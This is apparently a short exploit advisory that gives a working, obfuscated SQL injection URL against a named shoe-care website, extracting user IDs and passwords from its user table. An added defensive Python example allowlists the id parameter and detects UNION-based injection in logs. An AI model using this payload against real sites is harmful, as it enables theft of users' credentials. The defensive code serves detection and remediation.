————————————————————-*
#Exploit Title: cfshoecare – SQL Injection vulnerability
#Date: 2020-09-28
#Exploit Author: ERa
#Category: webapps
#Tested On: windows 10, Firefox

Proof of Concept:

Demo :
http://www.cfshoecare.com/?frame=product_detail&id=-167+/*!50000uNion*/+select+1,2,/*!12345unhex(hex(GrouP_coNcat(uid,0x3a,pwd)))*/,4,5,6,7,8,9,10,11,12,13,14,15+/*!12345From*/+tbl_user–
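
A defensive counterpart to the request above, added here as an example and not part of the original advisory: it checks the `id` parameter against an integer allowlist and labels UNION-based injection attempts in request logs, unwrapping MySQL versioned comments (`/*!50000...*/`) and mixed case first. It assumes `id` is a numeric product key; the host `shop.example.test` and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL executes the body of /*!NNNNN ... */ "versioned comments", so a filter
# must unwrap them rather than discard them like ordinary comments.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(\s+(all|distinct))?\s+select\b")
INTEGER_ID = re.compile(r"[0-9]{1,10}")  # assumption: id is a positive integer key

# Constructed sample requests (not taken from any real log).
SAMPLE_REQUESTS = [
    "http://shop.example.test/?frame=product_detail&id=167",
    "http://shop.example.test/?frame=product_detail"
    "&id=-1+/*!50000uNion*/+select+1,2,3+/*!12345From*/+t",
    "http://shop.example.test/?frame=product_detail&id=167abc",
    "http://shop.example.test/?frame=product_detail"
    "&id=1%2F%2A%2150000UnIoN%2A%2F%0ASeLeCt%201",
]


def normalize(value: str) -> str:
    """Reduce a decoded parameter to the SQL text MySQL would actually parse."""
    value = VERSIONED.sub(r" \1 ", value)   # keep the executable comment body
    value = PLAIN_COMMENT.sub(" ", value)   # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_request(url: str, param: str = "id") -> dict:
    """Allowlist check first; label anything that fails it for the SOC."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    result = {"url": url, "valid": True, "alert": None}
    for raw in query.get(param, []):        # parse_qs already URL-decodes
        if INTEGER_ID.fullmatch(raw):
            continue
        result["valid"] = False             # reject: never reaches the query
        if UNION_SELECT.search(normalize(raw)):
            result["alert"] = "union-select"
        elif result["alert"] is None:
            result["alert"] = "non-numeric-id"
    return result


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        verdict = inspect_request(request)
        print(verdict["valid"], verdict["alert"], verdict["url"])
```

The allowlist is what blocks the request; the normalisation only improves the alert label. The underlying fix remains binding `id` as a typed parameter in a prepared statement instead of concatenating it into the query.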



————————————————————-*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
————————————————————-*




